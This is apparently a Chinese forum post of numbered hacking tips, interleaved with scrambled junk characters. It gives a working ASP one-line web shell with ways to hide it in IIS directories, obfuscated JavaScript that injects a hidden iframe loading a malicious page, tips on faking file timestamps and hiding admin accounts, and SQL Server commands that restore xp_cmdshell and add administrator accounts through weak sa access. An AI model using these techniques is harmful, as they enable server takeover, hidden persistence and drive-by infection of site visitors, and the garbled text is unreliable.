52、at "12:17" /interactive cmd; R7 O* y* S6 ~- w
执行后可以用AT命令查看新加的任务* y2 `$ g3 o* n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。. s( P/ S# x$ q: x$ s- q
7 ?5 m1 @# l/ p4 Y4 b53、隐藏ASP后门的两种方法
0 m8 r$ z7 E3 Z) ~: P3 Q3 l+ D! q1、建立非标准目录:mkdir images..\) y% Y+ A, J$ o" h6 U
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 S$ t/ B% f% O" Z; S% S" {/ _
通过web访问ASP木马:http://ip/images../news.asp?action=login. @ `* Q' e. L O) U( B* G2 C
如何删除非标准目录:rmdir images..\ /s% i9 B4 U( K9 U# b! X4 m
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:2 G8 v' K( ?% o: b; T1 M/ ^4 g0 t
mkdir programme.asp8 V, V9 W7 @" c
新建1.txt文件内容:<!--#include file=”12.jpg”-->1 c& U% l# d3 |, S: l M) [
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
0 `- T# b$ U5 ^/ a( d# eattrib +H +S programme.asp
l1 P; e2 E& `. L0 E通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
* x0 m) p) t( ?2 m' s* m8 y
6 W7 D& ~0 F( s% v54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。 V5 s+ k5 e/ ?5 T9 X
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( K" x) A8 j! c+ d0 C5 u" o( G4 u8 W( ?3 u1 @- |9 }$ L& U4 u8 {
55、JS隐蔽挂马
( B8 d8 C" D; S1.
4 i# V! k1 H# { v- i( P3 O! d$ r$ Kvar tr4c3="<iframe src=ht";
* c. W( Y+ N% G& Vtr4c3 = tr4c3+"tp:/";
& Z( A: W& v+ \1 d) btr4c3 = tr4c3+"/ww";
: Y- z5 K$ N |1 i9 _! w$ C6 [ Str4c3 = tr4c3+"w.tr4";+ K+ Y* T$ X7 v* v' v! [
tr4c3 = tr4c3+"c3.com/inc/m";
. K! D8 s( O- E" Y+ S5 v3 g8 Btr4c3 = tr4c3+"m.htm style="display:none"></i";
7 k* A' @* A1 W8 `/ _tr4c3 =tr4c3+"frame>'";
+ Z' ?" F- M$ l$ S( ldocument.write(tr4c3);
& h7 p, B8 h0 n) E5 A- l避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。% [* D1 d' l5 X
- g) r- N, D- i3 E' B9 k% l: q5 \2.2 L$ U& ^3 T+ M( Q$ n" j/ B
转换进制,然后用EVAL执行。如
5 M4 `/ y/ a S7 Weval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
( a2 `, v; I% w2 \, S% |0 t6 }, |不过这个有点显眼。4 ]2 z F4 _4 K# t
3.
5 p0 T9 p5 H: Z. j$ Fdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
, Q5 `* r% i k最后一点,别忘了把文件的时间也修改下。% o0 b# d, d9 {# T8 V% w
, n8 l5 i. C9 F9 r* k- d
56.3389终端入侵常用DOS命令9 B! m5 Q4 b2 O
taskkill taskkill /PID 1248 /t
! R" ^- W9 e0 T3 X8 S2 M: A5 z+ \ u6 J( A! ~4 d- W6 W
tasklist 查进程2 u7 C/ ?6 M2 Z" Y3 S K+ @
! C$ v1 C1 K# i
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限) N: _. `/ q8 r6 l
iisreset /reboot% q6 L r1 I1 i8 h' S- ^! |
tsshutdn /reboot /delay:1 重起服务器, ^' j/ c3 w5 K
- o; h/ G& |6 w' qlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,- C5 r5 D7 r6 ~% D8 @; l
" W4 i* ]1 l' n* q( k y/ ~query user 查看当前终端用户在线情况
) s3 i2 X7 ]9 N2 @6 V: C" p5 H, ~/ p7 j2 C+ d/ A
要显示有关所有会话使用的进程的信息,请键入:query process *7 b/ ^9 u& j( v" J+ s7 y4 `
3 w9 m% R* r* h) K
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2' o, i% l' [0 _6 t% r- }+ H
. i' \8 d$ A+ d' d Y" i: @' O要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# P ~( a4 o9 W- |+ P6 Y8 U F$ n: {
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
6 k! ]. x+ X+ j: J1 N4 M0 o! P5 Y6 W7 U4 p6 Y! z
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启8 s p4 S. x# f0 a1 W
5 y E4 a1 ?' q# R7 v命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
! {& S5 z8 z5 B4 ~9 n: U$ i8 ]; d% D! e- s, X) ?$ K
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# p6 I9 \8 O4 A9 w% X' l
' w3 M0 l+ m3 i命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 g) r. v' n, a8 ?; g( ^; l% a
1 ^7 d( ]7 r" N% ]
56、在地址栏或按Ctrl+O,输入:4 G! @, g ^9 ^2 u- V2 e% s- R
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 o+ h* E- R$ ~ b) |+ q% d5 _ d) |+ E2 h0 @
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 s0 C- c5 h- o3 B. Q) s; L5 K* R4 p5 T6 I1 X+ d
57、net user的时候,是不能显示加$的用户,但是如果不处理的话," d8 G$ |" Q( f, w; O$ P
用net localgroup administrators是可以看到管理组下,加了$的用户的。; j5 ~1 j9 r& k2 i/ U1 g' ?- f: [
5 o6 d6 b5 g# U; ?' L9 a* `& e58、 sa弱口令相关命令
5 A5 G7 W& ^8 `
: u1 f7 Y7 f; [- B3 j一.更改sa口令方法:
0 ?6 w5 s: _! w用sql综合利用工具连接后,执行命令:
* i8 n' l, o, K; [; ]- E3 _+ k0 Qexec sp_password NULL,'20001001','sa'
) U( ?7 y" E# S(提示:慎用!)
8 `/ I8 z. p7 g; |& \- i: b- w' @# n {6 i! b" _0 x7 N1 f
二.简单修补sa弱口令.
( w7 i; {6 L3 f; Q; n
; i. ]( G0 {) ^+ C# G方法1:查询分离器连接后执行:
& g) J) G& r. qif exists (select * from
. w3 L* N0 o) Q1 _' i& K* Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and) E0 Y9 n4 r5 \7 p* c! n/ z( M
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)6 Z1 G7 S9 p, Z* {$ g$ g
6 Y1 o0 S1 C) x3 aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2 @2 R v+ J+ w; T* b- l% @( Q" H# R7 H/ h
GO/ E6 R3 y) b8 n, x* U
9 k* p8 g+ Q3 U0 V- @/ p i然后按F5键命令执行完毕
+ U7 {: _& x4 s- J1 i% ]5 p Z; v( W9 ]/ g- t! S' ], |
方法2:查询分离器连接后( {- G& J+ c3 [0 b/ I
第一步执行:use master
5 a6 S" ]2 ~0 X/ X6 W0 _第二步执行:sp_dropextendedproc 'xp_cmdshell'
* c9 j* k) y: i然后按F5键命令执行完毕
U3 [/ d/ j! e3 c1 l! z9 u
/ Z! e7 V S! m+ d" E \2 j. w; W+ [3 L% t4 o- ^" X
三.常见情况恢复执行xp_cmdshell./ G# N4 c8 n/ E* |& d3 K1 _
, T$ T( _8 o4 |* X; y3 a8 H/ S7 k! f: x! G5 Z
1 未能找到存储过程'master..xpcmdshell'.
/ @: e8 ?+ d( a" j. i# L' l& f4 S Y 恢复方法:查询分离器连接后,7 P s) { [7 c
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 j3 j: _ G2 P6 c$ Q- o \4 A1 E第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 T p/ D# O6 @+ c: H% Z
然后按F5键命令执行完毕0 p% |' z3 ~* p/ F# M) s
: y8 U; g) p; Q- H2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。), k/ @0 F: L& H2 G2 k
恢复方法:查询分离器连接后,
' i0 {) ?0 i+ E! q# z9 B第一步执行:sp_dropextendedproc "xp_cmdshell"
O' h" \- [% e' ]2 N, H第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') `4 Z+ ]* D2 H! ~. {
然后按F5键命令执行完毕# s% r1 {6 ]8 O
$ d0 S D1 v- G+ ^/ B3 _
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。); H! X8 Z$ Q+ P- _8 y
恢复方法:查询分离器连接后,; k4 k3 m& ~3 l" I. u
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 Q6 b4 G2 V+ r/ \! |第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
6 K6 ], @6 _ i. Q* h* ^3 n8 y0 k然后按F5键命令执行完毕4 t+ O+ l9 g! F4 y1 X Y" ^/ \
% f' W: p+ ]" n# |四.终极方法.
; P5 C' H3 M- Z8 K T如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! o7 Y: \/ {7 e3 r# G4 k+ T查询分离器连接后,
1 Z) o3 B j( \* Y& d6 }2 Z5 R2000servser系统:
+ m3 [2 S5 n+ \1 B0 ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'- e. a( C( t# L( A7 ?
0 G) o! C7 E& J# ^. f8 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 ]2 M3 g; q* Q, o' e( G V" N( `* Q) h7 P( n- N) v/ s3 `
xp或2003server系统:
; ]$ r6 w. W _5 J0 j0 g Q3 j& ]9 C% m0 B9 \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'( y6 L2 v! Y, _$ i$ |+ M c
" t0 T' j3 ]( \# `- G) w3 U% o# Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- s5 j9 {# m* V( y2 ~ |
发表于 2012-9-15 14:13:15
收藏
支持
反对